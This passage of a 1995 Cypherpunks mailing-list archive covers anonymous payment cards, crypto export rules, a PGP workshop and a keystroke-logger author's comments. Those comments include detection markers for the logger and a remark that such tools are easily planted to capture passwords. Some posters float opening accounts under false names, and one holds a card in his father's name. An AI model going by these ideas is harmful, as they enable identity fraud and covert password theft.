formal meeting at 1 (but don't get there at 1 and _then_ expect to
shmooze/eat for the next hour!). The machines should be ready to go by
1:30 at the latest, so that demos can begin.

If we have a lot of demos--not likely based on current
information--then I'll propose parallel tracks.

Please don't be bashful about doing a demo! The idea is to educate and
expose people to tools and software they might otherwise only vaguely
know about. Demos don't have to polished and professional.

And please send me a brief note if you want to demo something.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 2 Jan 95 13:20:50 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501022121.NAA07411@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There are a couple of issues here.  One is whether you could get a
debit card with another name printed on it than your own.  Sandy
Sandfort and some others have suggested here that this would be legal
and possible already as long as you don't do it with the intention to
commit fraud.  You can open a secured account by mail and give a false
name.

I'm not sure what you do in this situation if they ask to see some ID
when you try to use the card.  This would be rather embarrassing, it
seems to me.  Sorry, I guess I left my drivers license in my other
pants... Or, never mind, try this card.  That other one was from before I
changed my name...

The other issue is whether you could set up a payment system which did
not require social security numbers from the participants.  I think
this is much more questionable.  Although the phone cards and some
other restricted usage systems are apparently legal, bank accounts seem
to have many more restrictions.  Barter and scrip systems are also
heavily regulated.  All these laws involving reporting requirements,
etc., were passed to help the government track the flow of money.
There is no way the government is going to make an exception at this
point.  In fact, I suspect that if the limited systems expanded to
where they were used for general payments, the government would crack
down.  I recall reading that just such a crackdown occured in Las Vegas
when casino chips started to be accepted for non-gambling payments.

So, you may be able to have a form of anonymity from the person you are
transacting with, but I don't think you can be anonymous from the bank
and from the government.  And personally, I am more concerned about the
bank and gov't tracking my spending patterns than whether the guy I buy
gas from knowing my name.  The bank has a lot more information about me
which is much more threatening to my privacy.  A nom de guerre VISA or
debit card does not seem to help this problem.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF
3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A==
=CF5G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 2 Jan 95 13:43:20 PST
To: "Timothy C. May" <cypherpunks@toad.com
Subject: RE: Reminder: January 14th "Tools Demo Day" Meeting
Message-ID: <Chameleon.4.01.950102134344.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some may recall an idea I wrote about a couple weeks ago to provide
transparent encryption/signing/remailing facilities to users of Windows 
Sockets based mail agents on PC's (e.g., Eudora).

I have completed an initial portion of the program as a "proof of
concept."  All it does right now is act as a SMTP server and accepts
mail from a mail agent, performs requested encryption/signing operations
on received messages, and puts RFC 822 compliant outbound messages in a
directory for submission to a 'real' SMTP server. (No remailing features
present).

Of course, the next module to write is the SMTP client that takes this
outbound message queue and sends it off to the actual SMTP server.

It is a bare bones app with no user interface, fault tolerance, or
configuration options, and probably only works on my machine at the
moment :)

I don't expect to make any significant progress on the program between
now and the Jan. 14 meeting, but if anyone is interested I will bring it
to the meeting and "demo" what little there is at the moment.

==
Johnathan Corgan         "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                      -Isaac Asimov
WWW:                 ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.html


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLwhxw+lPfVlQ1n99AQH6CAf8DJmXqtuP24C39k3/qk4mRuGxm4IehWdQ
zdFjTgrzMuTXuM4SOtkV1k+JGZrjAW5G+tqiNLbNHDDzCWC/75G/8HMjUdWMSINq
gOHXUl3oKtm6R27ClGhIZKuWJwLF0UH4XpUDWvawj5lFdWhKmSThuuF3WG1RKivQ
PZjRh6Iq7wHf9wFI+rFRi8UHu311ZcyW4jR4h5R7siFeTd9GcBCEJ9CCQy+j+Vsu
AbplhNZVztooLVitsAkYdcNu2gcAdun5u7WOPuEIM/Mwsokg53z4+AoUrYCkjqmu
sqeAVr/S+1fwKXjMTSxt7qpIEUkErzTzhgQeQgLWYcUcnHg71A8AiA==
=rOcl
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Jan 95 10:26:08 PST
To: cypherpunks@toad.com
Subject: (Fwd) Re Anonymous posting
Message-ID: <199501021826.NAA11086@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in the anonymity issue there is a lively 
debate on list Cyberia-L (a legal list) which was stimulated, 
in part, by Peter Lewis's articles on anonymity and the 
LaMacchia case dismissal.

For participation send message to:

     listserv@listserv.cc.wm.edu

     subscribe cyberia-l Your name

Provocatively, I forward the following:


Forwarding mail by: jsilverm@reach.com (Jared Silverman -- NJ 
Bureau of Sec. - Newark) on Mon, 2 Jan 11:58 AM
-------------------

On January 1, 1995, Buford Terrell wrote:

>Anonymity is very much a core 1st Amendment value and at the
>center  of both political speech and the right to assemble.  
[Snip]
>Often times, the only way weak or unpopular minorites can 
speak
>is anonymously.  There have been many times when to couple 
one's
>name to one's writings would be to invite martyrdom.  I had
>rather  risk a few perverts than to stifle this most important
>channel for dissent.


It is one thing to claim First Amendment protection to shield  
political speech, IMHO it is another to shield fraud and 
criminal  behavior.

Besides the First Amendment runs against the government, not in 
 favor of individuals in actions brought by private parties.  
In  the sexism thread, would anyone claim that an individual 
has the  right to harass or stalk a person under the guise of 
the First  Amendment?  Would the First Amendment be a defense 
in a defamation  suit?  Of course not (Times v. Sullivan 
aside).  Doesn't an  individual have the right to know the 
identity of someone who is  trying to communicate with him/her 
on a private basis?  To a  certain extent, the question was 
crystallized in the caller ID  debate -- Who has the superior 
right, the calling party to anonymity or the called party to 
knowing who is calling?

One of the areas of my professional concern is the use of  
cyberspace for securities fraud and manipulation.  Cyberspace 
is  an ideal medium for these activities because of the 
availability  of anonymity and pseudonymity.  Even on 
commercial BBSs, where  "member lists" are available, posting 
to these lists is voluntary  and those who draw my attention 
are rarely on these lists.  Does  all of cyberspace become off 
limits to conventional private rights  and law enforcement 
under the rubric of "freedom of speech and  assembly?"



|--------------------------------------------------------------| 
 |A. Jared Silverman, Chief-New Jersey Bureau of Securities     
|  |jsilverm@reach.com | 201-504-3600 (phone) | 201-504-3601 
(fax)|  
|**************************************************************| 
 |    My purpose holds to sail beyond the sunset - Tennyson     
|  
|**************************************************************| 
 |The foregoing is the personal opinion of the sender and is 
not|  |the official position of either the Bureau of Securities 
or   |  |the New Jersey Attorney General and the Department of 
Law and |  |Public Safety.  Affiliation given for 
identification only.    |  
|--------------------------------------------------------------|









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 2 Jan 95 14:53:46 PST
To: carolann@icicle.winternet.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
Message-ID: <fQ72lyczBiz4075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>, you wrote:

> Right now, I don't think U.S. Customs is going to ask you if you
> have PGP in your PC if you leave the country, or return either.
> 
> They should, and I'd be proud to say yes.

And you can beam with pride as they impound your PC and take it away.
Gosh.  Sometimes it's just swell to be a cypherpunk.  Kinda chokes me 
up. . . .

Right now the situation is a sort of security-through-obscurity
situation where they're not going to bother you for having PGP on your
laptop's hard disk.  Security through obscurity sucks, but the present
situation is still better than the one where they know what to look for
and what questions to ask, and you're headed for the slammer if you
haven't gotten your temporary export license signed and stamped and
ready to go.

Do you want it to be easier to comply with bad law?

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLwh5U+VevBgtmhnpAQGWywMAhEpmFRrQXJPRpF4mPqAHmaxcGpZm00z2
acEogITT4O+aT+qGOoAiUnlaRWXOLmkOle75dhoAiJOabzRJ09rwXfyZzVLna8Gd
DI9fVCrIjodY3Xl6BLZfRjblmDIQT6LA
=RzSg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 2 Jan 95 12:38:34 PST
To: werewolf@io.org
Subject: Re: Anonymous payment scheme
Message-ID: <9501022030.AA03421@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 AM 1/2/95 -0600, Samuel Kaplin wrote:
>... I was looking at at the bigger picture. Any merchant who accepts Visa or MC
>could now accept anonymous payments. No hassle at all on their part. They
>probably wouldn't even know that it was an anonymous account. It fits into
>the existing infrastructure very nicely.

If you can convince BankAmerica or MasterCard International to deal with you.

> ... Walk into the issuing authority, plunk your $9999.99 on the counter 
and > ask for your card. When you've spent it all, toss the card.

Right there you imply one of the requirements you'd need to fulfill--the 
reporting requirements on cash transactions over $10K.  If you accepted many 
deposits over $5K, you probably get asked a lot of questions about how 
you're preventing people from structuring transactions to avoid the 
reporting requirement.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Mon, 2 Jan 95 15:37:03 PST
To: KEY-CAPTURE@lsd.com
Subject: Comments on Key Capture Survey
Message-ID: <199501022337.PAA05279@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


I am the author of the Last Resort keystroke capture program for the
Macintosh, published by Working Software, Inc..  I am writing up the
surveys for LR for Mac, DOS and Windows and will send them shortly.  I have
a couple of comments, which the list might be interested in hearing.

Your entries for the Macintosh should record the file type and creator
code, which are, for Last Resort, 'cdev' and 'mIKE' respectively (case is
significant).  If someone were to write an automated scanner meant to
protect a disk against such utilities, it would be much more reliable if it
looked for the creator codes, as Mac programs are usually written to not
depend on having a particular file name.  These codes live in the file
system, but are not part of the name space as '.EXE' would be on DOS.  You
can view them with ResEdit's "Get File/Folder Info" item from the File
menu.

We spent a lot of time pondering the problem of password theft.  We decided
that the benefit to the consumer of having this utility available to save
data outweighed the obvious danger of password and text theft.  The problem
increases, though, if one is not aware that Last Resort is installed.  The
Read Me file on the distribution disks has a discussion of this problem (as
well as the problem of people snarfing your files when you share your disk
to the whole company or campus), and there is a way to disable key capture
temporarily, for password entry.

I'm not real happy with the ease one can sneak Last Resort onto someone's
machine, but I take a little ironic solace in knowing that similar programs
that are "more hidden" than LR are available in source code form from
Phrack, at least for DOS.

On the plus side, I have gotten many, many letters, e-mails and phone calls
from people who say it saved their butts when a piece of critical
information would have been lost.  I had the habit of taking customer
orders over the phone while in the middle of debugging a program (like Last
Resort!) and would frequently crash before the order could be saved or
printed.  LR saved my company real money in this case.

David Pogue's book _Hard Drive_ is based in part on Last Resort, in that a
key capture utility is used to recover a password that saves the world.  I
was quite tickled by this.

I'm sad to say, though, that I know of one case in which Last Resort
precipitated the end of a relationship, in which a fellow discovered the
love letters his girlfriend had e-mailed to someone else in his Last Resort
files.  This particular fellow was glad that he found out about it, but I
still feel a twinge of guilt when I think about it.

I certainly support any effort made to document the existence of these
programs.  I might suggest that one way to defend against them would be to
watch for the patching of certain system calls - patching GetNextEvent or
installing a jGNEFilter on the Mac, and warning the user if this happens.
It's easy to detect such patching; for the most part it will be innocent,
but a hacker who had a fair amount of Mac programming knowledge could make
a keystroke capture program in an evening of work, so attempting to catalog
them all will provide only moderate protection against them.

BTW... most of those other commercial keystroke capture programs (no names
here) are clones of Last Resort.  Some of them even had the gall to use our
logo in their advertising (in a claim they were better than us).  LR might
not do as much as some of them, but I know that it is more reliable than
the competitors I have tested.  So if you are going to actually _use_ a key
capture program for your own (legitimate!) use, consider getting The Real
Thing, the One True Key Capture Program, the Saviour of Data: Last Resort.

I don't work for WSI any more, but we remain friends, and they can be
reached at:

Working Software, Inc.
PO Box 1844
Santa Cruz, CA 95061-1844
(408) 423-5696
(800) 229-9675
(408) 423-5699 FAX
working@scruznet.com
76004.2072@compuserve.com

Cheers,

Michael D. Crawford
crawford@scruznet.com     <- Please note change of address.
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Mon, 2 Jan 95 13:00:10 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Regarding anonymous debit cards..
In-Reply-To: <Pine.NXT.3.91.950102120713.12977A-100000@kisa>
Message-ID: <Pine.SV4.3.91.950102153905.24408A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


>   Alot of the banks in the US are now offering these cards for use with 
> checking accounts.

   Yes.  There are also the ``secured'' credit cards where one deposits X 
dollars into the issuing bank and is allowed 1.5 * X in credit.  Many of 
these will promote to ``real'' credit cards after a year or some specific 
amount of charging that's been paid back on time (usually about $1000).  
These are a godsend for those who've gone bankrupt; as such I wouldn't be 
terribly surprised if the issuers didn't even bother to do a credit check 
until the card promotes, if at all.  If this is the case, what's to stop 
someone from filling out the application under a pseudonymous identity 
with a mail drop as the contact address?    

>   I think they should. If they would is another matter. It would be 
> similar to having a 'secret' Swiss bank account that can be accessed from 
> anywhere in the world, converted to cash at cash machines, transferred to 
> others, etc.

   It's a great idea - at last year's Siggraph convention I needed to 
stay in contact with an associate 24 hours a day if need be.  I 
discovered that in the Kinko's in the Orange County Convention Center 
there's a cellular phone rental machine, but it took credit cards and the 
people at the desk wouldn't let me rent one without one - even though 
I offered to leave my ID and a sizable deposit.  

   I'm technically not old enough to get a credit card, and regardless of 
that fact when I spoke to someone at Barnett Bank about getting one and 
listed my occupation as 'Consultant' she laughed in my face.

   Solution: I got a secured card from a bank in Vermont.  They have $500 
of my money in an account, and I have a card with a $500 limit in my 
father's name.  

>   If there was an Anonymous Visa debit card I'd defiantly go for it. It 
> would certainly keep those marketing types from tracking my spending 
> patterns.

   Without a doubt.  I wonder, again, if the issuing bank even _cares_ 
who you are if you get one of these secured cards.  There was discussion 
here about debit/secured cards some time ago - anyone remember the upshot 
of the discussion?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave.hodgins@canrem.com (Dave Hodgins)
Date: Mon, 2 Jan 95 13:58:58 PST
To: cypherpunks@toad.com
Subject: key servers list
Message-ID: <60.18197.6525.0C1C6B79@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 
  Does anyone have an up-to-date list of pgp keyservers available?

  Is there a fingerable keyserver, like wasabi@io.com used to be?

  Thanks in advance, Dave Hodgins.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwh0YJbACHtihSGlAQGxAwQAmCTfolPaXfyRIKWl+u8fzSrlLxv25GjB
k/+50n11ErwRbJHRPsSAS8okZ9xq8CiVuCUiiOdFe3R7K3idCLVSVQeYWpBcy7ZO
F1vUqcUrsqiar3IxUDAW0UAK5eIf/B5CIsN9TgYMxj7gd0r1UkSXjfgXq+PR9Iqf
tMyBOICzwpU=
=4FTc
-----END PGP SIGNATURE-----
**EZ-PGP v1.07

---
 * RM 1.3 00820 * Internet:Dave.Hodgins@Canrem.com Rime->118 Fido(1:229/15)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 2 Jan 95 18:39:55 PST
To: Carol Anne Braddock <carolann@icicle.winternet.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
Message-ID: <Pine.3.89.9501021852.A19801-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995, Carol Anne Braddock wrote:
> Right now, I don't think U.S. Customs is going to ask you if you
> have PGP in your PC if you leave the country, or return either.
> 
> They should, and I'd be proud to say yes.

Well Carol, I am sure your heart is in the right place, but I
do not agree.

They should not, and I'd be deranged to say yes.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 2 Jan 95 18:57:12 PST
To: nobody@rahul.net
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <199501021725.AA09061@bolero.rahul.net>
Message-ID: <Pine.3.89.9501021805.A19801-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995 nobody@rahul.net wrote:
> Doesn't Matt's experience really show simply that not enough people try
> to follow the rules, [...] 
>
> [...]
> 
> I could see a system where you routinely fill out and have your card
> stamped when you check your luggage to show that you are carrying crypto.
> Then you turn it in when you come back.  [...]  How does this
> advance the CP cause?

Exactly so.  Surely we are better off with a system that does not
work.

Furthermore, with the current system, entropy works in our favor.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Mon, 2 Jan 95 21:36:57 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Appolgy to P. Zimmerman
Message-ID: <Pine.HPP.3.91.950102211315.15028A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Zimmerman,
I would like to take this opertunity to publicaly appologize to
Mr Zimmerman (the primary author of PGP).
  In a post to the internet I criticized Mr. Zimmerman for takeing a short
route to legalize PGP short term rather then directly attack Public Key
Partners so-called patent of public encryption. 
  I would like appologize, as I have now been presented with the opertunity
for a business venture requiring encryption of data I realize that we 
don't all have the legal resourses to be maveriks and challenge 
patents. Some of us need encryption now and it's only a matter of time before
PKP's patents fall.

--Syed Yusuf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Mon, 2 Jan 95 08:58:31 PST
To: Samuel Kaplin <skaplin@skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <qbx1lKjqRC$2075yn@skypoint.com>
Message-ID: <Pine.3.89.9501030049.A16477-0100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



Well, I know some shops have so called 'switch' or 'smart' cards to debit 
your account, some of these are on their own credit line, others are not.

I have an account with a bank in Britain which gives me a "VISA" Card 
which is actually a 'direct-debit' card.  I can use it (and have) all 
around the world as a regular VISA card and in any 'VISA compatible' ATM.

As soon as my balance drops to zero, I can no longer use it.  And when I 
do, the money jumps out of my account immediately and can no longer be used.

This is a bank-issued card, and also acts as my ATM card to access my 
current account - there is NO charge for this.  I'm not sure exactly how 
that works.

Whether or not VISA would accept a proposal from First National 
Cyberphunks or not remains to be seen...

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever
> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 3 Jan 95 00:19:29 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd)
Message-ID: <199501030819.DAA29763@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just thought you may be interested in this. 
Anybody ever hear of this EFH group?  It's nice to see somebody making
PGP a little easier for the average jane/joe end-user-type to use.
 
- From the node of FringeWare Daily:
: 
: Sent from: Jon Lebkowsky <jonl>@io.com
: 
: >From: robbiew@inviso.com
: >Summary: January 14, 3:00 PM, SCCSI offices in Houston
: >Keywords: Houston EFH PGP Workshop
: 
: 		     Electronic Frontiers Houston
: 			      presents a
: 		     Free Cryptography Workshop:
: 		    How to use Pretty Good Privacy
: 				(PGP)
: 		      presented by Paul Elliott
: 			 14 January 1995 3PM
: 
: 
: It has become apparent that the data super highway is not safe. Messages
: traveling the data highway can be hijacked by sinister data interlopers.
: 
: After six months of unpaid labor, in June, 1991 Philip Zimmermann
: released his controversial freeware program Pretty Good Privacy (PGP).
: Just as Prometheus' liver was eternally chewed by eagles for the crime
: of bringing fire to mankind, Philip Zimmermann's liver is now being
: chewed by the Federal Eagle (The U.S. Custom Service) for the alleged
: crime of releasing strong cryptography to the world.
: 
: As a result of Philip Zimmermann's contribution, you can use the widely
: available freeware program PGP to send electronic-mail messages to
: anyone in the world, in complete privacy! In addition you can send
: authentication with your messages so that the recipient can verify that
: the message really came from you. You can encrypt sensitive files on
: your computer so that the files remain private even if your computer and
: disks are stolen.
: 
: In this free workshop, our presenter Paul Elliott will show you how you
: can use PGP effectively, easily, and intelligently. PGP is available for
: most popular computers and Operating Systems, including MSDOS, UNIX, MAC
: and OS/2 among many others.
: 
: The Workshop will take place at on January 14, at 3:00 PM at the
: offices of South Coast Computing located at 1811 Bering, Suite 100. Park
: in the garage, and ignore the "contract only" sign.  Enter through the
: back door (adjacent to the garage) and use the house phone (dial 100) if
: the door is locked.
: 
: 
:       | Augusta   | Bering    | Chimney Rock   | 610 Loop West       ^
:       |           |           |                |                     |
:       |           |           |                |                     N
:   ----+-----------+-----------+----------------+---- San Felipe
:       |           |* SCCSI    |                |
:       |           |           |                |
:   ----+-----------+-----------+----------------+---- Westheimer
:       |           |           |                |
:       |           |           |                |
:   ----+-----------+-----------+----------------+---- 59 South (SW Fwy)
:       |           |           |                |
:       |           |           |                |
: 
: 
: For more information call (713)799-1044 or
: email efh@blkbox.com
: 
: --
: Robbie Westmoreland			robbiew@inviso.com
: Electronic Frontiers Houston  announcement
: 
: 
: 
: 
: 
: -- 
: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
: Jon Lebkowsky             FringeWare<tm>, Inc.            jonl@fringeware.com
: URL http://fringeware.com/staff/jonl/jonl.html           voxmail 512-444-2693
: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
: 
: 
: 
: 
: 

- -----
Mark Rogaski a.k.a. Doc                 "I used to think that my brain was the
rogaski@phobos.lib.iup.edu               best part of my body ... but then I
http://www.lib.iup.edu/~rogaski/         remembered who was telling me this."
100,000 lemmings can't be wrong!                         - Emo Phillips

>>>>>finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<<

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             with me, much less my university or employer...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwkIix0c4/pqJauBAQGBpAQArkyQpzJi4ux+gDGrHAmbFMvifVkRYFfG
KpkFcPC+h8eGZy3/bbGsKuev7ZXICUBKpf7KIPtg7P4vaD3hPyjRVZahu5doIWiY
9k//PkA0ViMq3p/bT0dfDcMavBVUppHNs4g8FxV0njqXinIT1PI42PRfroGSwL7m
FqtECicCS3Y=
=QD7G
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmorris@netcom.com (Bob MorrisG)
Date: Tue, 3 Jan 95 07:42:27 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com>
Message-ID: <199501031542.HAA11629@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


HH> So, you may be able to have a form of anonymity from the person you ar
HH> transacting with, but I don't think you can be anonymous from the bank
HH> and from the government.  And personally, I am more concerned about th

With a debit card you can't be anonymous, because your money resides in
the bank.  With digital cash, and the ability to transfer money to
another digital cash card via phone lines, I don't see how they can
successfully trace everything.  They will try, no doubt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Tue, 3 Jan 95 08:15:04 PST
To: Bob MorrisG <bmorris@netcom.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501031542.HAA11629@netcom11.netcom.com>
Message-ID: <Pine.NXT.3.91.950103080014.28792B-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Bob MorrisG wrote:

> HH> So, you may be able to have a form of anonymity from the person you ar
> HH> transacting with, but I don't think you can be anonymous from the bank
> HH> and from the government.  And personally, I am more concerned about th
> 
> With a debit card you can't be anonymous, because your money resides in
> the bank.  With digital cash, and the ability to transfer money to
> another digital cash card via phone lines, I don't see how they can
> successfully trace everything.  They will try, no doubt.

  I don't see why a debit card couldn't be anonymous, even to the point 
of having no name, AND no picture on it. Yes, the bank has the money, but 
their only obligation is to dish it out to the vendors/ATMs that you have 
used your card with. Why should a bank care who you are once they have 
your money in the account.

  As to avoiding fraud with the card, is it really that huge of a 
problem? As long as noone copies the number(could go so far as no 
embossed number. Just a gloss black card with a hologram of a Bald Eagle 
on the front of it), and you don't lose the card how can someone use your 
account?

  I think that this anonymous debit card would be a good first step 
towards anonymous digital cash. You still couldn't exchange digital cash 
with your buddy in Taiwain, but it would work for converting to physical 
cash(Which I still like, and is the best anonymous cash around right now).

  Anyone here adept enough at finance to write a proposal for CitiCorp? :>
How would they make their mony off the cards? Annual fees, and vendor 
percentages I guess?

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 3 Jan 95 05:18:10 PST
To: Hal <cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <v01510101ab2efaf7b3ee@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 PM 1/2/95, Hal wrote:
>I'm not sure what you do in this situation if they ask to see some ID
>when you try to use the card.  This would be rather embarrassing, it
>seems to me.  Sorry, I guess I left my drivers license in my other
>pants... Or, never mind, try this card.  That other one was from before I
>changed my name...

Why not, "It's a pseudonym."?

Looks like an evangelistic opportunity to me. Pseudonyms can't be illegal,
or Mark Twain and Bob Dylan would have written from prison. ;-).

I also don't believe that you are legally required to produce ID for a
credit card purchase.  That was the point about those pictures on the front
of Citibank cards. Citicorp did that to get around the legal restrictions
on demanding ID to cope with the much larger issue of fraud. Most (smaller)
vendors hardly check the signature on the back, much less validating it
against a state ID, however.

Hmmm. What if you produced a pseudonym card *with* your picture on the
front?  I smell a market opportunity. Or not...

>And personally, I am more concerned about the
>bank and gov't tracking my spending patterns than whether the guy I buy
>gas from knowing my name.  The bank has a lot more information about me
>which is much more threatening to my privacy.  A nom de guerre VISA or
>debit card does not seem to help this problem.

Indeed.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Tue, 3 Jan 95 09:30:30 PST
To: cypherpunks@toad.com
Subject: EFF PGP Workshop
Message-ID: <01HLEL9APM96000ONS@MR.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Sure would be nice to have a PGP workshop in the Bay Area - any EFF 
    members or others willing?
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 3 Jan 95 09:44:37 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
